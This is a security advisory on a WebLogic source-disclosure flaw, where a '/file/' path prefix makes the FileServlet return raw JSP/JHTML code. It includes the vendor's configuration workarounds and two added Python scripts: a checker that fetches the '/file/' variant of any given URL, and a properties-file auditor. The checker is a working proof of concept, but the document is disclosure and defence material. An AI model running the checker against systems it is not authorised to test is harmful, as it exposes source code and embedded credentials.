COMMAND
WebLogic Server and Express
SYSTEMS AFFECTED
BEA WebLogic Server and Express 3.1.8, 4.0.x, 4.5.x, 5.1.x
PROBLEM
The following is based on a Foundstone Security Advisory. A source
disclosure ("show code") vulnerability exists in BEA's WebLogic 5.1.0
that allows a remote attacker to view the source code of any file
within the web document root of the web server, including JSP and JHTML
pages that would normally be compiled before being served.
WebLogic relies on four main Java Servlets to serve different
kinds of files. These servlets are:
FileServlet - for plain HTML pages
SSIServlet - for Server Side Includes pages
PageCompileServlet - for JHTML pages
JSPServlet - for Java Server Pages
Looking at the weblogic.properties file, here is how each of these
servlets is registered:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
Further along in the weblogic.properties file, a default servlet is
declared; it is called upon if a requested file does not have a
registered handler. The lines below show how the default servlet is
registered:
# Default servlet registration
# ------------------------------------------------
# Virtual name of the default servlet if no matching servlet
# is found
weblogic.httpd.defaultServlet=file
The example configuration registers the FileServlet under the virtual
name "file", so any request whose path is prefixed with "/file/" is
routed straight to the FileServlet by that name. The FileServlet simply
reads the named file from the document root and returns it, so the
extension-based handlers (JSPServlet, PageCompileServlet,
ServerSideIncludeServlet) are bypassed and the page is returned without
being parsed or compiled.
This is easy to verify on a given system. If the URL for a file
"login.jsp" is:
http://site.running.weblogic/login.jsp
then requesting
http://site.running.weblogic/file/login.jsp
returns the unparsed contents of the file, including any server-side
code it contains, to the web browser.
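The verification step above, as a small black-box check. This is an added example, not part of the Foundstone advisory or of BEA's code. It assumes the server is reachable over HTTP and that the FileServlet is registered under the documented virtual name "file" (a different name can be passed in); the source markers it looks for and the two sample response bodies are constructed here for offline use.

```python
"""Black-box check for the WebLogic FileServlet source-disclosure issue.

Added example for illustration; not the advisory's or BEA's code. The
marker patterns and sample bodies below are constructed, and the
virtual name "file" is the documented default (override if renamed).
"""
import re
import sys
import urllib.request
from urllib.parse import urlsplit, urlunsplit

# Server-side markup that should never survive into a compiled page.
SOURCE_MARKERS = (
    re.compile(r"<%@\s*page", re.IGNORECASE),       # JSP page directive
    re.compile(r"<%[=!]?"),                          # JSP scriptlet/expression
    re.compile(r"<java>", re.IGNORECASE),            # JHTML java block
    re.compile(r"<!--\s*#include", re.IGNORECASE),   # SSI include directive
)


def file_servlet_url(url: str, servlet_name: str = "file") -> str:
    """Prefix the path of *url* with the FileServlet's virtual name.

    http://host/app/login.jsp -> http://host/file/app/login.jsp
    """
    parts = urlsplit(url)
    path = parts.path if parts.path.startswith("/") else "/" + parts.path
    return urlunsplit(parts._replace(path="/" + servlet_name + path))


def looks_like_source(body: str) -> bool:
    """True if the body carries markup that should have been compiled away."""
    return any(m.search(body) for m in SOURCE_MARKERS)


def is_disclosing(normal_body: str, file_body: str) -> bool:
    """Disclosure: the /file/ variant shows source markers, the normal
    (compiled) response for the same page does not."""
    return looks_like_source(file_body) and not looks_like_source(normal_body)


def fetch(url: str, timeout: float = 10.0) -> str:
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check(url: str, servlet_name: str = "file") -> bool:
    """Fetch both variants of *url*; True when source disclosure is observed."""
    normal = fetch(url)
    raw = fetch(file_servlet_url(url, servlet_name))
    return is_disclosing(normal, raw)


# Constructed sample bodies standing in for a compiled page and its source.
SAMPLE_COMPILED = '<html><body><form action="login">...</form></body></html>'
SAMPLE_RAW = ('<%@ page import="java.sql.*" %>\n'
              '<% String dbPass = request.getParameter("p"); %>\n'
              '<html><body><form action="login">...</form></body></html>')

if __name__ == "__main__":
    if len(sys.argv) == 2:
        print("VULNERABLE" if check(sys.argv[1]) else "not disclosing")
    else:
        print(file_servlet_url("http://site.running.weblogic/login.jsp"))
        print(is_disclosing(SAMPLE_COMPILED, SAMPLE_RAW))
```

Run it with the URL of a page you know is a JSP or JHTML file; run it again after applying either vendor workaround to confirm that /file/ (or whatever name the FileServlet now carries) no longer returns source. Comparing against the normally served page avoids false positives on sites that legitimately emit text resembling a scriptlet.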
SOLUTION
Workaround (The vendor recommends)
==================================
Do not use the example configuration for the FileServlet in
production situations. It is possible to view the source of a
JSP/JHTML file in a browser if you do. For more information on
the file servlet, see "Setting up the File Servlet" in the online
documentation at:
http://www.weblogic.com/docs51/admindocs/http.html#file
The example registrations look like this:
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.file=defaultFilename=index.html
weblogic.httpd.defaultServlet=file
There are two ways to avoid this:
* Register the file servlet with a name that uses a random string
that will be difficult to guess. For example, the following
registrations will register the file servlet as 12foo34:
weblogic.httpd.register.12foo34=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.12foo34=defaultFilename=index.html
weblogic.httpd.defaultServlet=12foo34
* Register the file servlet using wildcards representing all of
the file extensions you will be serving. For example, the
following registrations register the file servlet to serve
.html files:
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.*.html=defaultFilename=index.html
weblogic.httpd.defaultServlet=*.html
Repeat the above registrations for all the file types you will be
serving, for example, *.gif, *.jpg, *.pdf, *.txt, etc.
Note: This information is documented in the BEA WebLogic Server and
Express documentation at:
http://www.weblogic.com/docs51/admindocs/lockdown.html
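A way to audit a weblogic.properties file for the registrations discussed in this section, as an added example (not a BEA tool). It parses only the two line shapes the page shows, weblogic.httpd.register.<name>=<class> and weblogic.httpd.defaultServlet=<name>, and the three sample property sets are constructed from the configurations above. It rates the documented name "file" as high, any other non-wildcard name as low, because the random-name workaround only hides the servlet rather than removing the raw-file path, and stays silent for the wildcard form.

```python
"""Audit weblogic.properties for FileServlet registrations reachable by
virtual name. Added example, not BEA's code; sample properties below are
constructed from the advisory's configurations."""
import re
from typing import Dict, List, Optional, Tuple

FILE_SERVLET = "weblogic.servlet.FileServlet"
REGISTER = re.compile(r"^weblogic\.httpd\.register\.(\S+?)=(\S+)$")
DEFAULT = re.compile(r"^weblogic\.httpd\.defaultServlet=(\S+)$")


def parse_properties(text: str) -> Tuple[Dict[str, str], Optional[str]]:
    """Return ({virtual_name: servlet_class}, default_servlet_name)."""
    registrations: Dict[str, str] = {}
    default: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = REGISTER.match(line)
        if m:
            registrations[m.group(1)] = m.group(2)
            continue
        m = DEFAULT.match(line)
        if m:
            default = m.group(1)
    return registrations, default


def audit(text: str) -> List[str]:
    """Findings for FileServlet bindings that can be addressed as /<name>/<path>.

    A wildcard name such as *.html is only matched by extension and has no
    path prefix an attacker can use, so it produces no finding.
    """
    findings: List[str] = []
    regs, default = parse_properties(text)
    for name, cls in regs.items():
        if cls != FILE_SERVLET:
            continue
        if name == "file":
            findings.append("HIGH: FileServlet registered as 'file', the documented "
                            "example name; /file/<path> serves any file unparsed")
        elif "*" not in name:
            findings.append(f"LOW: FileServlet reachable as /{name}/<path>; "
                            "protection rests only on the name being unguessable")
    if default is not None and default not in regs:
        findings.append(f"INFO: defaultServlet={default} names no registered servlet")
    return findings


# Constructed samples: the example configuration and the two vendor workarounds.
WEAK = """\
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.file=defaultFilename=index.html
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
weblogic.httpd.defaultServlet=file
"""
OBSCURED = """\
weblogic.httpd.register.12foo34=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.12foo34=defaultFilename=index.html
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
weblogic.httpd.defaultServlet=12foo34
"""
HARDENED = """\
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.*.html=defaultFilename=index.html
weblogic.httpd.register.*.gif=weblogic.servlet.FileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
weblogic.httpd.defaultServlet=*.html
"""

if __name__ == "__main__":
    for label, props in (("weak", WEAK), ("obscured", OBSCURED), ("hardened", HARDENED)):
        print(label, audit(props) or ["no findings"])
```

Point it at the live weblogic.properties of each server; a non-empty list means the /<name>/ path to raw files still exists, and the wildcard form is the one that removes it rather than renaming it.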
Fix
===
Contact the vendor.